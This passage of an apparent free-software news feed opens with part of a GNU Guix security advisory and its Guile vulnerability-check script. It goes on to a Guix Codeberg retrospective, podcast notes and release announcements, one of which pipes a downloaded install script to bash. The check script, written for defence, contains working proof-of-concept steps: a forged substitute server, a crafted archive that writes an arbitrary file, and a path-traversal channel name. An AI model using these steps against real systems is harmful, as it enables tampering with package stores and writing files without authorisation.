Some additional hardening was also done, so that substitutes are restored inside a temporary directory and only moved to their final store item path once the hash is verified. This still restores them before verifying the hash, so it wouldn't have prevented (1), but it does ensure that attacker-controlled contents are not present at the path of what may have once been a valid store item (and may still be considered by some users or programs to be valid if they haven't taken note of a recent garbage collection). The narinfo-reading code was also modified to reject as invalid any narinfo file whose StorePath, References, or Deriver field contained a path that did not obey the store item path syntax requirements. A nice side-effect of this is that we now have procedures for verifying the syntax of store item paths.

Fixing vulnerability (4) involved changing how cache-key was computed by default for users of authenticate-repository. Rather than being derived from the name of the channel or (for guix git authenticate) the url of the repository, cache-key is now derived from the ID of the introductory commit, which is a very safe hexadecimal string. This also avoids some strange and potentially-dangerous behavior in which cached authenticated commit IDs could be shared between two channels that happen to share a name but are otherwise completely different. Additional hardening of authenticate-repository was added to turn all occurrences of . in cache-key into - so that even if non-default cache keys were provided, it would not be possible to escape the cache directory.

Upgrading

Due to the severity of this security advisory, we strongly recommend all users to upgrade guix and guix-daemon immediately.

Note: The astute reader may have noticed a dilemma: the fastest way to get updates is through substitutes, and the way to mitigate the most severe of the remotely-exploitable vulnerabilities is to disable substitutes. Whether to pass --no-substitutes is therefore a judgment call that must take into consideration how long it has been since these vulnerabilities were made public, how exposed the network paths between your system and your substitute servers are, how feasible it is for the system in question to build guix by itself (which will depend in part on how long it has been since you last upgraded), whether the system in question has multiple users, and of course, your threat model.

For Guix System, the procedure is to reconfigure the system after a guix pull, either restarting guix-daemon or rebooting. For example:

guix pull
sudo guix system reconfigure /run/current-system/configuration.scm
sudo herd restart guix-daemon

where /run/current-system/configuration.scm is the current system configuration but could, of course, be replaced by a system configuration file of a user's choice.

For Guix on another distribution, one needs to guix pull with sudo, as the guix-daemon runs as root, and restart the guix-daemon service, as documented. For example, on a system using systemd to manage services, run:

sudo --login guix pull
sudo systemctl restart guix-daemon.service

Note that for users with their distro's package of Guix (as opposed to having used the install script) you may need to take other steps or upgrade the Guix package as per other packages on your distro. Please consult the relevant documentation from your distro or contact the package maintainer for additional information or questions.

Timeline

  • May 28th, 2026. Jörg Thalheim of Nix shares the restore-file vulnerability with Christopher Baines and Andreas Enge; Christopher sends details to the Security Response Team.
  • June 4th, 2026. Andreas Enge notifies Caleb Ristvedt and Ludovic Courtès who start working on a fix.
  • June 10th, 2026. Caleb Ristvedt finds the file:// vulnerability of guix substitute.
  • June 22nd, 2026. Caleb Ristvedt finds the third vulnerability: that guix substitute did not verify whether the narinfo it is getting is the one it asked for.
  • June 24th, 2026. Following an issue reported by Sergio Pastor-Pérez, Ludovic Courtès identifies the pull and time-machine vulnerability and works on a fix. For the sake of convenience and because hints were available publicly, it was decided that it should be promptly fixed and disclosed at the same time as the other vulnerabilities.

Conclusion

We would like to thank Jörg Thalheim for sharing the restore-file vulnerability, Christopher Baines for verifying it and informing the Security Response Team, and Andreas Enge for ensuring that it reached Ludovic and Caleb and facilitating ongoing communication with Jörg.

We would also like to thank John Kehayias of the Security Response Team for coordination and for requesting CVE IDs.

Test for presence of vulnerability

Below is code to check if your guix-daemon is vulnerable to the first three vulnerabilities and your guix is vulnerable to the fourth. Save this file as guix-substitute-and-pull-vuln-check.scm and run following the instructions above, in "Mitigation."

(use-modules (git)
             (guix build utils)
             (guix derivations)
             (guix channels)
             (guix config)
             (guix gexp)
             (guix git)
             (guix narinfo)
             (guix packages)
             (guix pki)
             (guix utils)
             (guix serialization)
             (guix store)
             (guix substitutes)
             ((gnu packages base) #:hide (which))
             (gnu packages esolangs)
             (srfi srfi-1)
             (srfi srfi-26)
             (srfi srfi-31)
             (srfi srfi-34)
             (rnrs bytevectors)
             (ice-9 atomic)
             (ice-9 binary-ports)
             (ice-9 control)
             (ice-9 match)
             (ice-9 popen)
             (ice-9 rdelim)
             (ice-9 textual-ports)
             (ice-9 threads)
             (web response)
             (web request)
             (web uri)
             (web server)
             (web server http))

;; 1. restore-file

;; Craft an invalid nar, identify a substitutable path that doesn't exist (gc
;; if necessary), get its signed narinfo, start an http server, connect to
;; store, set substitute urls, ask to substitute the chosen path.  Have http
;; server serve the signed narinfo with the URLs replaced with its own.  When
;; the nar is requested, serve the invalid nar.  Once the substitution errors
;; out (hash doesn't match), check whether the chosen file now exists with the
;; specified contents.  We're vulnerable if and only if it does.

(define target-file
  "/tmp/guix-restore-file-vulnerable")

(define target-substitutable-package
  ;; pick something obscure but in the main guix channel, so it is either not
  ;; currently valid or can probably be gc'ed.  This is just to make the test
  ;; more reliable - in real exploitation, an attacker can sit around and wait
  ;; for any substitute request to be made, but here we need to provoke one in
  ;; a timely manner.
  cfunge)

(define substitute-servers
  (with-store store
    (substitute-urls store)))

;; Grafts can cause package->derivation to actually start substituting outputs
;; of the derivation being computed, which means we'd have to gc it afterward.
(%graft? #f)

(define (package->path+narinfo store package)
  (define path
    (derivation->output-path (run-with-store store (lower-object package))))

  (match (lookup-narinfos/diverse substitute-servers (list path)
                                  valid-narinfo?)
    ((info) (values path info))
    (() (values #f #f))))

(define (restore-file-vuln?)
  (define-values (target-path target-info)
    (call-with-values (lambda ()
                        (with-store store
                          
                          (package->path+narinfo store
                                                 target-substitutable-package)))
      (lambda (path info)
        (unless info
          (error "can't find substitutable path to test 'restore-file' with\n"))
        (with-store store
          (when (valid-path? store path)
            (when (null? (delete-paths store (list path)))
              (error "can't delete substitutable path to test 'restore-file' with\n"))))
        (values path info))))

  (define new-target-info-contents
    (let* ((contents (narinfo-contents target-info))
           (signature-index (string-contains contents "Signature:"))
           (after-signature-index (string-index contents #\newline
                                                signature-index))
           (signed-contents (string-take contents (or after-signature-index
                                                      (string-length
                                                       contents)))))
      (string-append signed-contents "
URL: example.nar
Compression: none
NarSize: 0\n")))

  ;; We can't delete target-file if it's owned by root, so overwrite it with
  ;; fresh, mostly-random contents each time, and check that the contents match.
  (define test-contents
    (format #f "VULNERABLE!~%~S:~S~%" (getpid) (random 100000000)))

  (define test-nar
    (call-with-output-bytevector
     (lambda (port)
       (for-each (lambda (s)
                   (write-string s port))
                 `("nix-archive-1"
                   "(" "type" "directory"
                   "entry" "(" "name" "a"
                   "node" "(" "type" "symlink"
                   "target" ,target-file ")" ")"
                   "entry" "(" "name" "a"
                   "node" "(" "type" "regular"
                   "contents" ,test-contents  ")" ")"
                   ")")))))

  (define bad-request
    (build-response #:code 400 #:reason-phrase "Unexpected request"))

  (define target-uri-path
    (string-append "/" (store-path-hash-part target-path) ".narinfo"))

  (define nar-uri-path "/example.nar")

  (define (handle request body)
    (cond
     ((not (eq? (request-method request) 'GET))
      (values bad-request ""))
     ((string=? (uri-path (request-uri request)) target-uri-path)
      (format (current-error-port)
              "Returning narinfo pointing to test nar~%")
      (values (build-response #:code 200)
              new-target-info-contents))
     ((string=? (uri-path (request-uri request)) nar-uri-path)
      (format (current-error-port) "Returning test nar~%")
      (values (build-response #:code 200)
              test-nar))
     (else
      (values bad-request ""))))

  (call-with-port (socket PF_INET SOCK_STREAM 0)
    (lambda (sock)
      (setsockopt sock SOL_SOCKET SO_REUSEADDR 1)
      (bind sock (make-socket-address AF_INET INADDR_LOOPBACK 0))
      (listen sock 5)
      (let* ((port-number (sockaddr:port (getsockname sock)))
             (substitute-url (string-append "http://localhost:"
                                            (number->string port-number)
                                            "/"))
             (server-thread (call-with-new-thread
                             (lambda ()
                               (run-server handle http
                                           `(#:socket ,sock))))))
        (with-store store
          (set-build-options store
                             #:substitute-urls (list substitute-url))
          (guard (c ((store-error? c)
                     ;; XXX doesn't actually cancel until something tries
                     ;; connecting
                     (cancel-thread server-thread)
                     ;;(join-thread server-thread)
                     (and (file-exists? target-file)
                          (string=? (call-with-input-file target-file
                                      get-string-all)
                                    test-contents))))
            (build-things store (list target-path))
            ;; If the substitution actually completes without throwing then we
            ;; are most definitely vulnerable, but not just in 'restore-path'.
            (error "!!!substitution of invalid nar completed???!!!")))))))



;; 2. fetch-narinfos

;; Identify two substitutable paths P1 and P2.  Get P1 and P2's signed
;; narinfos, start an http server, connect to store, set substitute urls, ask
;; whether P1 and P2 are substitutable.  Have http server serve P2's narinfo
;; when asked for P1's, and P1's when asked for P2's.  If vulnerable, it will
;; report that both are substitutable, if not, it will report that neither
;; are.

;; We need two substitutable paths because the daemon<-->'guix substitute
;; --query' interface verifies that the info it gets back is for a path that
;; was requested, so the "replacement" path has to also be queried for
;; substitutability at the same time.

(define (fetch-narinfos-vuln?)
  (define-values (hello-path hello-info)
    (with-store store (package->path+narinfo store hello)))

  (define-values (sed-path sed-info)
    (with-store store (package->path+narinfo store sed)))

  (define bad-request
    (build-response #:code 400 #:reason-phrase "Unexpected request"))

  (define hello-uri-path
    (string-append "/" (store-path-hash-part hello-path) ".narinfo"))

  (define sed-uri-path
    (string-append "/" (store-path-hash-part sed-path) ".narinfo"))

  (define (handle request body)
    (cond
     ((not (eq? (request-method request) 'GET))
      (values bad-request ""))
     ((string=? (uri-path (request-uri request)) hello-uri-path)
      (format (current-error-port) "Returning sed when asked for hello~%")
      ;; Return the wrong result
      (values (build-response #:code 200)
              (narinfo-contents sed-info)))
     ((string=? (uri-path (request-uri request)) sed-uri-path)
      (format (current-error-port) "Returning hello when asked for sed~%")
      ;; Return the wrong result
      (values (build-response #:code 200)
              (narinfo-contents hello-info)))
     (else
      (values bad-request ""))))

  (unless (and hello-info sed-info)
    (error "can't find substitutable paths to test 'fetch-narinfos' with"))

  (call-with-port (socket PF_INET SOCK_STREAM 0)
    (lambda (sock)
      (setsockopt sock SOL_SOCKET SO_REUSEADDR 1)
      (bind sock (make-socket-address AF_INET INADDR_LOOPBACK 0))
      (listen sock 5)
      (let* ((port-number (sockaddr:port (getsockname sock)))
             (substitute-url (string-append "http://localhost:"
                                            (number->string port-number)
                                            "/"))
             (server-thread (call-with-new-thread
                             (lambda ()
                               (run-server handle http
                                           `(#:socket ,sock))))))
        (with-store store
          (set-build-options store
                             #:substitute-urls (list substitute-url))
          (let ((substitutables
                 (substitutable-paths store (list hello-path sed-path))))
            ;; XXX doesn't actually cancel until something tries connecting
            (cancel-thread server-thread)
            ;;(join-thread server-thread)
            (not (null? substitutables))))))))

;; 3. file-uris

;; Create a fifo whose name is 32 nix-base32 characters followed by
;; ".narinfo", connect to store, set substitute urls to point to containing
;; directory, spawn a thread to block trying to open fifo write-only which
;; will subsequently set a flag and close the port, then ask whether some
;; store path with that hash is substitutable.  It should fail in all cases.
;; Check whether the flag is set; if so, we're vulnerable, otherwise we're
;; not.

(define (file-uris-vuln?)
  (call-with-temporary-directory
   (lambda (directory)
     (define testfifo
       (string-append directory "/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.narinfo"))
     (define opened? (make-atomic-box #f))
     (define store-item
       (string-append (%store-prefix) "/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-foo"))

     (define open-thread
       (begin
         (mknod testfifo 'fifo #o744 0)
         (call-with-new-thread
          (lambda ()
            (call-with-port (open testfifo O_WRONLY)
              (lambda (port)
                (atomic-box-set! opened? #t))))))) 

     (with-store store
       (set-build-options store
                          #:substitute-urls (list (string-append "file://" directory)))
       (guard (c ((store-error? c)
                  (cancel-thread open-thread)
                  (delete-file testfifo)
                  ;; even though the file it is trying to open no longer
                  ;; exists, the kernel doesn't give a result to open-thread
                  ;; until someone ptraces it (or maybe sends a signal or
                  ;; something).
                  ;; (join-thread open-thread)
                  (atomic-box-ref opened?)))
         (substitutable-paths store (list store-item))
         (error "not supposed to get here!\n"))))))

;; 4. cache-key

;; Create a barebones git repository that is a valid channel, create a
;; <channel> that references it using a malformed name, set XDG_CACHE_HOME to
;; a directory inside a temporary directory (so that 'cache-directory' points
;; to a subdirectory of it), call authenticate-channel, see if a file outside
;; of XDG_CACHE_HOME gets created.

;; If you don't have Internet access, edit this to point to a local repository
;; containing at least commit 5a2d9baeda971df575c017669bca8eb8faa22ebd and its
;; ancestors, and the keyring branch.
(define guix-science-url
  "https://codeberg.org/guix-science/guix-science.git")

(define (create-test-channel directory channel-name)
  "Populate REPOSITORY with the necessary contents for it to be a valid
channel with 2 commits, then return three values: a <channel> for it with name
CHANNEL-NAME and an introduction to the first commit, the first commit, and
the second commit."
  (define intro-commit
    "b1fe5aaff3ab48e798a4cce02f0212bc91f423dc")

  (define end-commit ;; The commit following intro-commit
    "5a2d9baeda971df575c017669bca8eb8faa22ebd")

  (define fingerprint
    "CA4F 8CF4 37D7 478F DA05  5FD4 4213 7701 1A37 8446")

  (define git %git) ;; From (guix config), guix has a hard dependency on git

  (with-directory-excursion directory
    (invoke git "init"
            ;; Silence warning
            "--initial-branch=main")
    (invoke git "remote" "add" "--" "origin" guix-science-url)
    (invoke git "fetch" "--" "origin" end-commit)
    (invoke git "checkout" "FETCH_HEAD")
    (invoke git "fetch" "--" "origin" "refs/heads/keyring:keyring")
    (values
     (channel
       (name channel-name)
       (url (canonicalize-path directory))
       (introduction (make-channel-introduction
                      intro-commit
                      (openpgp-fingerprint fingerprint))))
     intro-commit
     end-commit)))

(define (cache-key-vuln?)
  (call-with-temporary-directory
   (lambda (directory)
     (let ((home (string-append directory "/home"))
           (channel-repo (string-append directory "/channel-repo"))
           (testfile (string-append directory "/testfile")))
       (mkdir home)
       (mkdir channel-repo)
       (with-environment-variables `(("HOME" ,home)
                                     ("XDG_CACHE_HOME" ,(string-append home
                                                                       "/.cache")))
         (call-with-values
             (lambda ()
               (create-test-channel channel-repo
                                    (string->symbol "../../../../../testfile")))
           (lambda (channel first-commit last-commit)
             (authenticate-channel channel channel-repo last-commit
                                   #:keyring-reference-prefix "")))
         (file-exists? testfile))))))

;; Results

(define vulnerabilities
  (list (list "restore-file" restore-file-vuln?)
        (list "fetch-narinfos" fetch-narinfos-vuln?)
        (list "file-uris" file-uris-vuln?)
        (list "cache-key" cache-key-vuln?)))

(define (call-with-errors-to-string proc)
  (define tag (make-prompt-tag))
  (call-with-prompt tag
    (lambda ()
      (with-throw-handler #t
        proc
        (rec (self key . args)
             (let* ((stack (make-stack #t
                                       1 ;self ;; Causes make-stack to return #f??
                                       tag
                                       ))
                    (frames (stack-length stack))
                    (frame (stack-ref stack 0)))
               (define error-string
                 (match args
                   (((or (? string? proc) (? symbol? proc))
                     (? string? message) (args ...) . rest)
                    (call-with-output-string
                      (lambda (port)
                        (display-error frame port proc message args
                                       rest))))
                   (args
                    (call-with-output-string
                      (lambda (port)
                        (print-exception port frame key args))))))

               (display-backtrace stack (current-error-port))
               (display error-string (current-error-port))
               (abort-to-prompt tag (string-append "error: "
                                                   (string-trim-both
                                                    error-string)))))))
    (lambda (_ . args)
      (apply values args))))

(define results
  (map (match-lambda
         ((name proc)
          (list name (if (string? proc)
                         proc ;; pass message through
                         (call-with-errors-to-string proc)))))
       vulnerabilities))

(for-each (match-lambda
            ((name vulnerable?)
             (format #t "~a: ~a~%"
                     name
                     (if (boolean? vulnerable?)
                         (if vulnerable? "vulnerable" "not vulnerable")
                         vulnerable?))))
          results)

(exit (if (any second results) 1 0))
  •  

2.5 Admins 306: WiFi Cable

Why setting up commercial email and VPN services is incredibly hard, avoiding TrueNAS’s move from FreeBSD to Linux, why we avoid virtualising storage systems, and bridging WiFi to an external building.

 

Plugs

Support us on patreon and get an ad-free RSS feed with some early episodes

Using Object Storage with OpenZFS and SeaweedFS

 

Discussion

Jeff Moss explains why setting up private email and VPN services are so difficult

 

Feedback

XigmaNAS

 

Free consulting

We were asked about bridging WiFi to an external building.

Point-to-point Wi-Fi bridging between buildings—the cheap and easy way

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

Installare Mailman3 in un server con qmail e vpopmail

Mailman è un software libero per la gestione delle discussioni via mail e le liste di distribuzione. Mailman è integrato con il web, al fine di semplificare agli utenti la gestione degli account e agli ai proprietari (owners) l'amministrazione delle liste. Mailman comprende come parte integrante il sistema di archiviazione, il processamento automatico dei rimbalzi (bounce), il filtro dei contenuti, la spedizione dei digest, filtri anti spam, e altro.

Mailman è un software libero distribuitosotto la GNU General Public License, e scritto nel linguaggio di programmazione Python.

Indice

  •  

unifont @ Savannah: Unifont 17.0.05 Released

28 June 2026 Unifont 17.0.05 is now available.  This is a minor release aligned with Unicode 17.0.0.

This release notably includes separate BDF, PCF, and OpenType font files with Unicode T-source Chinese glyphs created by Kusanagi_Sans and Kao Chen-tung (高振東) in font files beginning with "unifont_t".  Many other Chinese glyphs have been added.  See the ChangeLog file for details.

Download this release from GNU server mirrors at:

     https://ftpmirror ... /unifont-17.0.05/

or if that fails,

     https://ftp.gnu.o ... /unifont-17.0.05/

or, as a last resort,

     ftp://ftp.gnu.org ... /unifont-17.0.05/

These files are also available on the unifoundry.com website:

     https://unifoundr ... /unifont-17.0.05/

Font files are in the subdirectory

     https://unifoundr ... 0.05/font-builds/

A more detailed description of font changes is available at

      https://unifoundr ... nifont/index.html

and of utility program changes at

      https://unifoundr ... nt-utilities.html

Information about Hangul modifications is at

      https://unifoundr ... hangul/index.html

and

      http://unifoundry ... l-generation.html

  •  

parallel @ Savannah: GNU Parallel 20260622 ('Rape Gang Inquiry') released [stable]

GNU Parallel 20260622 ('Rape Gang Inquiry') has been released. It is available for download at: lbry://@GnuParallel:4

Quote of the month:

  GNU Parallel is much nicer than xargs and more powerful ... definitely recommended!
    -- boomertsfx@reddit

New in this release:

  • testsuite reorganized.
  • Bug fixes and man page updates.


GNU Parallel - For people who live life in the parallel lane.

If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.


About GNU Parallel


GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.

If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.

GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.

For example you can run this to convert all jpeg files into png and gif files and have a progress bar:

  parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif

Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:

  find . -name '*.jpg' |
    parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200

You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/

You can install GNU Parallel in just 10 seconds with:

    $ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
       fetch -o - http://pi.dk/3 ) > install.sh
    $ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50
    12345678 c555f616 391c6f7c 28bf9380 44f4ec50
    $ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4
    70727536 3428aa9e 9a136b9a 7296dfe4
    $ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259
    83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45
    b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21
    $ bash install.sh

Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1

Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.

When using programs that use GNU Parallel to process data for publication please cite:

O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014.

If you like GNU Parallel:

  • Give a demo at your local user group/team/colleagues
  • Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists
  • Get the merchandise https://gnuparall ... igns/gnu-parallel
  • Request or write a review for your favourite blog or magazine
  • Request or build a package for your favourite distribution (if it is not already there)
  • Invite me for your next conference


If you use programs that use GNU Parallel for research:

  • Please cite GNU Parallel in you publications (use --citation)


If GNU Parallel saves you money:



About GNU SQL


GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.

The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.

When using GNU SQL for a publication please cite:

O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.


About GNU Niceload


GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.

  •  

qmail - basic setup

Changelog

  • 25 giugno 2026
    - disponibile il ramo netqmail per utenti OpenBSD
  • 19 agosto 2025
    - netqmail-1.07.1 ora compila con gcc 15.3
  • 10 febbraio 2025
    - i sorgenti di netqmail sono ora compatibili con le nuove versioni di gcc e clang.
    - rinominati come netqmail-1.07 i vecchi sorgenti di netqmail

  •  

2.5 Admins 305: Short Two

The one tool in our IT tool belt that we value the most. This is a short episode because Joe is having a summer break.

 

 

 

 

 

 

 

 

See our contact page for ways to get in touch.

 

  •  

GNU Guix: One year with Codeberg

A year ago, Guix migrated to Codeberg for source code hosting, issue tracking, and pull requests. This is a significant change for a project with more than 400 people contributing code each year, after more than decade hosting code at Savannah and dealing with bug reports and patches by email, tracked by a Debbugs instance. This article discusses the process that led to this change and lists some takeaways, a year later.

The non-obvious choice

For years before, the question of our choice of source code hosting and collaboration tools would regularly come up. However, with a community effectively built around the existing tools and workflows, a change to a pull-request workflow was far from obvious—even if many would admit that yes, pull requests are more familiar to many younger hackers than patches and bug reports by email.

Active contributors were efficient with the email workflow—often thanks to Emacs and/or to top-notch email clients—while at the same time being critical of “modern” Web-based forges: after all, Debbugs weighs in at a few hundred lines of Perl, building upon the battle-tested standards and built-in federation of email, whereas a forge like Forgejo is much bigger with hundreds of Go dependencies.

A further complication is that, over time, contributors had built tools around this workflow: mumi would provide a nice web interface to Debbugs and the Quality Assurance service would automatically apply patch series in a Git branch and build packages from that branch—to give the most visible examples. Migrating was all but obvious.

Despite these achievements, dissatisfaction was palpable though, even more so when Steve George (a.k.a. Futurile) published the results of the first user and contributor survey in January 2025, with feedback from no less than 900 people. For contributors who took part in the survey, the email workflow was often mentioned as a hindrance.

Making decisions

As if things were not difficult enough, there was no “benevolent dictator” that the project could rely on to make a sharp decision. Instead, in December 2024, the project adopted a process for collective decision-making: the Guix Consensus Document (GCD) process. The process is ambitious: instead of merely asking “project members” (a concept that needs to be properly defined!) to vote on proposals, authors of proposals are expected to work with everyone to build consensus on the proposal; participants cannot merely “oppose” a proposal but should instead express their needs and suggest concrete changes to address them. At the end of the process, participants can “support”, “accept”, or “disapprove” the final revision of the proposal.

It is too early to tell whether the GCD process will stand the test of time—as of this writing seven proposals were submitted through this process, with varying outcomes—but it surely proved to be a good way to work collectively on the forge migration issue, which was the first real-world use of the GCD process.

GCD 002 was submitted in February 2025 as a proposal to migrate to Codeberg for source code hosting and collaboration. The discussion lasted for two months—the maximum duration permitted by the process—with contributions by many people. Two thirds of the Guix team members participated in the deliberation, among which 72% expressed “support” while the remaining 28% merely “accepted” the proposal; nobody “disapproved” it so the proposal came into force in early May 2025.

The discussion showed that many long-time contributors were not comfortable with the idea of moving to a workflow largely perceived as Web-first and inefficient compared to the email workflow. The idea of abandoning part of the infrastructure carefully built around the email workflow over the years was also unappealing. Yet, the prospect of reaching out to a broader community and improving the developer experience for many was probably a driving force that led to this positive outcome.

One thing in the proposal that didn’t trigger much debate though is the preference both for a free-software-based forge and for one hosted by a non-profit, Codeberg e.V. This choice is very much in line with the Guix ethos.

Switchover

As agreed-upon in the GCD, the switch to Codeberg was incremental: the main repository was migrated on May 25th, 2025, with the former repository still available as a mirror today; the former issue and patch tracker was kept active until January 1st, 2026, when Codeberg issues and pull requests became the only supported mechanisms (but older bug reports and patches remain accessible on-line).

Thanks to the planning devised during the consensus-building discussion, there were few hiccups and surprises when we switched. The quality of service achieved by the Codeberg e.V. employees and volunteers has been very good and the occasional downtime was usually short and clearly communicated.

For some of us, the main difficulty was to adapt to the new workflow. For those who prefer a workflow out of the browser, the good news is that Emacs interfaces—fj.el and more recently Emacs-Forgejo—have been getting better everyday thanks to their amazing developers; the ability to create pull requests using the AGit workflow has also helped bring peace and harmony.

The one issue that wasn’t sufficiently anticipated is continuous integration for pull requests. The part of qa.guix.gnu.org that would previously build packages for patches sent by email was not ported to Codeberg. For several months, it was up to reviewers to make sure that pull requests would not break anything—a situation that was not sustainable.

Screenshot of a “review” by @guix-cuirass-bot that specifies successful and failed package builds.

In September 2025, an instance of Cuirass was set up at pulls.ci.guix.gnu.org to finally build pull requests. This was initially seen as a stopgap because of several limitations compared to what qa.guix.gnu.org would previously do—such as the fact that packages now get built for a single architecture. However, one advantage for newcomers is that feedback is immediately visible: Cuirass sends reports indicating success or failure directly in pull requests as guix-cuirass-bot.

Renewed collaboration

One of the intuitions and hope we had when we decided to migrate to Codeberg is that the pull-request workflow and its Web interface would allow us to reach out to a broader set of contributors. How did it go?

A first insight is that the commit rate—measured as the number of commits pushed on the main branch—is a noisy metric that doesn’t reveal much. What we see by looking at the period from May 2024 to May 2026 (so one year before and one year after the migration) essentially shows that the commit rate remained essentially between “high” and “very high”:

Graph showing the monthly commit rate between May 2024 and May 2026.

(As an aside, where are the tools to plot statistics like this from a Git repository? I found myself hacking something together.)

Looking at contributions is more insightful. The plot below shows the number of monthly commit authors, the number of monthly committers, and the number of new commit authors each month (people who authored a commit for the first time in the Git history) for that same period.

Graph showing monthly contributions to Guix.

The number of monthly authors, including new authors, keeps growing. There was a peak both in the number of authors and number of newcomers in June 2025, right after the migration to Codeberg, but for the rest growth appears to be comparable in the 2025–2026 half and in the 2024–2025 half. Guix keeps attracting new contributors but there wasn’t a significant “Codeberg effect”.

The slight increase in number of monthly committers compared to the sharper increase in number of authors might suggest that committers are more “productive”, handling more contributions.

Since the user survey highlighted some contributors were frustrated by the delay or the lack of response on contributed patches—a problem that many free software projects struggle with—a question is how well Guix deals with that today. The graph below shows the creation and closing rate of pull requests per month over the past year, together with the monthly backlog (pull requests opened the month before or earlier and still opened). This data was acquired using the amazing Forgejo interface.

Graph showing pull request rate from May 2025 to May 2026.

This again shows an impressive rate of incoming code—more than 500 pull requests opened each month!—and an equally impressive, but slightly lower, merge rate, leading to a constantly-increasing backlog. A similar backlog was observed on Debbugs before. Today, there are about 639 opened pull requests out of 6,459 ever opened, or 10%; for comparison, Nixpkgs has 12k opened pull requests out of 473k ever opened, or 2.5%. This concerning backlog in Guix can perhaps be attributed to excessive friction and/or insufficient continuous integration feedback.

One source of friction is the requirement for each commit to be signed by an authorized committer. Unlike many other projects, including Nixpkgs, this requirement means that a person needs to take responsibility and to apply and sign changes they merge, as opposed to just clicking the “Merge” button. In a way, we’re trading developer convenience for user security. It’s a tradeoff we’re willing to make because we care about securing the “software supply chain”, but we have yet to see if this cost can be mitigated in some way.

On the bright side, and although this is harder to measure, one positive impact of the move to Codeberg is that activity within the project is more legible. I already mentioned continuous integration that provides feedback directly in pull requests, such that contributors immediately discover it, but there’s more.

Guix teams are reified as Codeberg teams and their scope is given the CODEOWNERS file such that the right people are pinged. A bot also adds a corresponding label—e.g., the team-python label for what’s in the scope of the Python team—allowing for issue and pull request filtering by label. However, teams are not notified of issues tagged with the corresponding label, which is irritating.

Other features such as cross-references among issues/pull requests as well as milestones also appear to facilitate collaboration.

Outlook

This is nice and all but there’s still room for improvement.

Our infrastructure could use some help. Build power for pulls.ci.guix.gnu.org should be increased, ideally with also more diversity—building for non-x86 architectures would be great! Cuirass itself has a number of shortcomings; some are being addressed for the upcoming 1.4.x series but there’s more work to be done. And also, pulls.ci.guix.gnu.org remains very much package-oriented; it would be nice, when appropriate, to run system tests as well.

The packager workflow still leaves a bit to be desired, in particular with regards to topic branches and world rebuild scheduling, which is still mostly tied to… our otherwise retired bug tracker.

We also want to remain good citizens, not causing excessive load on Codeberg servers (oops!) and keeping an eye on storage use: a single “fork” of Guix could exceed Codeberg’s new per-user quota of 750 MiB. The solution would be to require new contributors to use the AGit workflow to create pull requests. AGit is already popular among Guix contributors; however, the idea of requiring it is seen as a “downgrade” by some because it lacks the familiarity of the “regular” pull request workflow. One way to mitigate that might be to make it more discoverable with an “AGit fork” icon as was done for Gentoo.

Part of being a good citizen, for Guix and for Codeberg e.V., is listening to and accounting for one another’s concern, and this has worked beautifully so far. Guix Foundation recently voted to become a supporting (non-voting) member of Codeberg e.V. as a way to express gratitude and support.

Oh, breaking news: a pull request adding Forgejo and a service to set it up on Guix has just been submitted! Purely declarative configuration, fully reproducible deployment of a forge—can you imagine⁈ Symbiosis at play.

Acknowledgments

Many thanks to Steve “Futurile” George, Noé Lopez, and Maxim Cournoyer for reviewing an earlier draft of this post.

  •  

Gary Benson: longintrepr.h

Did your pip install fail with longintrepr.h: No such file or directory? The file likely is on your system, but it sometime or another it was moved, from /usr/include/python3.xx/longintrepr.h to /usr/include/python3.xx/cpython/longintrepr.h. The proper fix is to update the package in question with the new path, but if you’re installing an old version of something or a package that’s no longer maintained you can work around it like this:

ln -s /usr/include/python3.*/cpython/longintrepr.h .venv/include
  •  

2.5 Admins 304: Wiring a House

Wiring up a house for networking including cables, access points, connectors, and racks. Plus Google is found liable for what its AI overviews say.

 

Plugs

Support us on patreon and get an ad-free RSS feed with some early episodes

Managing Cache and DirectIO for Databases on ZFS

Webinar: June 30th @ 11am EDT: FreeBSD After Hours AMA

 

News/discussion

Landmark German ruling declares Google’s AI Overviews are Google’s own words and makes it liable for false answers

 

Free consulting

We were asked about wiring up a house for access points etc.

Jim’s guide to Wi-Fi AP placement

